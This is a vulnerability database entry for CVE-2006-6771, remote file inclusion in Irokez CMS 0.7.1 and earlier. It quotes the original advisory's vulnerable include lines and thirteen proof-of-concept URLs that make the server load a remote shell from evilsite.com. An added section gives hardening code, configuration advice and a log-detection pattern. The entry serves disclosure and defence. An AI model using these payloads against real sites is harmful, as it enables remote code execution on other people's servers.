Irokez CMS Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111862    Vulnerability type: Input validation
Published: 2006-12-25    Updated: 2007-01-02
CVE ID: CVE-2006-6771    CNNVD ID: CNNVD-200612-574
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/3007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-574
|Vulnerability details
Irokez CMS (0.7.1 and earlier, per the advisory below) contains multiple PHP remote file inclusion vulnerabilities. The scripts under scripts/ and functions/ build include paths from $GLOBALS['PTH'] without initialising it, so when register_globals is enabled a remote attacker can execute arbitrary PHP code by supplying a URL in (1) the GLOBALS[PTH][func] parameter to (a) scripts/gallery.scr.php; (2) the GLOBALS[PTH][spaw] parameter to (b) scripts/xtextarea.scr.php; and (3) the GLOBALS[PTH][classes] parameter to (c) sitemap.scr.php, (d) news.scr.php, (e) polls.scr.php, (f) rss.scr.php and (g) search.scr.php in scripts/, and to (h) form.func.php, (i) general.func.php, (j) groups.func.php, (k) js.func.php, (l) sections.func.php and (m) users.func.php in functions/.
|Exploit
+-------------------------------------------------------------------------------------------
+ Irokez CMS <= 0.7.1 Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.irokez.org/
+ Affected Software .: Irokez CMS <= 0.7.1
+ Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
+ Description .......: "Irokez is a blogging based CMS"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Irokez CMS has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ scripts/sitemap.scr.php, line(s) 13:
+ -> 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
+ scripts/news.scr.php, line(s) 11:
+ -> 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
+ scripts/polls.scr.php, line(s) 03:
+ -> 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
+ scripts/rss.scr.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
+ scripts/search.scr.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
+ scripts/xtextarea.scr.php, line(s) 03-04:
+ -> 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
+ -> 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
+ functions/form.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/general.func.php, line(s) 06:
+ -> 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";  //TBL_Lang description
+ functions/groups.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
+ functions/js.func.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/sections.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
+ functions/users.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-25]
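The following is an added example and not code from Irokez CMS or from the advisory above. It puts the include pattern the advisory quotes from scripts/gallery.scr.php (line 11) beside one way to harden it: refuse direct requests to include-only files, derive base paths from the file's own location instead of a global the request can populate, and pin every included file under a fixed directory. IN_IROKEZ, IROKEZ_ROOT, deny_direct_access(), resolve_include() and the two wrapper functions are names assumed here for illustration; they do not exist in Irokez CMS.

```php
<?php
// Added example, not Irokez CMS code. IN_IROKEZ, IROKEZ_ROOT and the
// functions below are illustrative names that do not exist in Irokez CMS.

// ---- Vulnerable: an uninitialised array element flows straight into require_once ----
// scripts/*.scr.php and functions/*.func.php can be requested directly. They
// expect the front controller to have filled $GLOBALS['PTH'] but never check.
// With register_globals=On, on a PHP build that still lets the request
// populate $GLOBALS (PHP 4.4.3 / 5.1.4 closed that), the query string
//   ?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
// makes the string below "http://evilsite.com/shell.php?gallery.func.php".
// require_once fetches it over HTTP and executes the response as PHP; the
// trailing "?" turns the appended file name into a harmless query string.
function vulnerable_gallery_include()
{
    require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
}

// ---- Hardened ----
// 1. Files that are only meant to be included refuse direct requests. The
//    front controller defines IN_IROKEZ before including anything, so a direct
//    hit on scripts/gallery.scr.php gets a 403 instead of running with an
//    empty (or attacker-supplied) $GLOBALS['PTH'].
function deny_direct_access()
{
    if (!defined('IN_IROKEZ')) {
        header('HTTP/1.0 403 Forbidden');
        exit('Direct access is not permitted.');
    }
}

// 2. Base paths come from the file's own location, never from request data.
//    This file is assumed to live in scripts/, one level below the app root.
define('IROKEZ_ROOT', realpath(dirname(__FILE__) . '/..') . DIRECTORY_SEPARATOR);

// 3. Every include is pinned under a fixed directory. The name must be a plain
//    *.php file name (no scheme, no separators, no ".." segment) and the
//    resolved path must still sit under that directory after realpath() has
//    expanded symlinks and "..". realpath() returns false for URLs and for
//    missing files, so a failed prefix check covers both cases.
function resolve_include($subdir, $name)
{
    if (!preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\.php$/', $name)) {
        throw new RuntimeException("Refusing to include '$name'");
    }
    $base = realpath(IROKEZ_ROOT . $subdir);
    $path = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("'$name' does not resolve under " . IROKEZ_ROOT . $subdir);
    }
    return $path;
}

function hardened_gallery_include()
{
    deny_direct_access();
    require_once resolve_include('functions', 'gallery.func.php');
    require_once resolve_include('classes', 'gallery.class.php');
}
```

The deployment side matters as much as the code: register_globals=Off removes the injection vector entirely, and allow_url_include=Off (PHP 5.2 and later) or allow_url_fopen=Off stops require/include from fetching remote code at all, so the PoC above needs an old interpreter with both the loose setting and the $GLOBALS overwrite still permitted. In web server access logs the attempts are easy to spot: requests for scripts/*.scr.php or functions/*.func.php whose query string contains GLOBALS[PTH][ followed by a URL scheme such as http://.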
|References

Source: BID
Name: 21769
Link: http://www.securityfocus.com/bid/21769
Source: VUPEN
Name: ADV-2006-5178
Link: http://www.frsirt.com/english/advisories/2006/5178
Source: SECUNIA
Name: 23497
Link: http://secunia.com/advisories/23497
Source: MILW0RM
Name: 3007
Link: http://milw0rm.com/exploits/3007